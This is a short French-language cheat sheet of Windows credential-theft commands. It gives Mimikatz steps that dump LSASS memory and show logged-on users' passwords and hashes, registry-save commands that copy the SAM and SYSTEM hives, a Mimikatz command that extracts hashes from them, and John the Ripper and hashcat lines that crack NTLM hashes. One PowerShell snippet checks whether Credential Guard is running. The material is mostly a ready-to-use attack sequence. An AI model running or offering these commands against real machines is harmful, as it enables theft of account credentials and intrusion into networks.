Démarrer Mimikatz et créer un fichier de log
# mimikatz.exe
# privilege::debug
# log c:\temp\mylog.log
Lire la mémoire du processus lsass.exe (avec procdump ou taskmgr)
# sekurlsa::minidump lsass.dmp
Montrer les mots de passe / hashes des usagers connectés
# sekurlsa::logonpasswords
Copier les clés de registre SYSTEM et SAM
# reg save HKLM\SYSTEM system.hiv
# reg save HKLM\SAM sam.hiv
Extraire les hashes avec Mimikatz
# lsadump::sam /system:system.hiv /sam:sam.hiv
Script powershell pour déterminer si Credential Guard est configuré et fonctionne sur la machine
$DevGuard = Get-CimInstance –ClassName Win32_DeviceGuard –Namespace root\Microsoft\Windows\DeviceGuard
if ($DevGuard.SecurityServicesConfigured -contains 1) {"Credential Guard configured"}
if ($DevGuard.SecurityServicesRunning -contains 1) {"Credential Guard running"}
Si on veut cracker les HASH(NTLM)
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt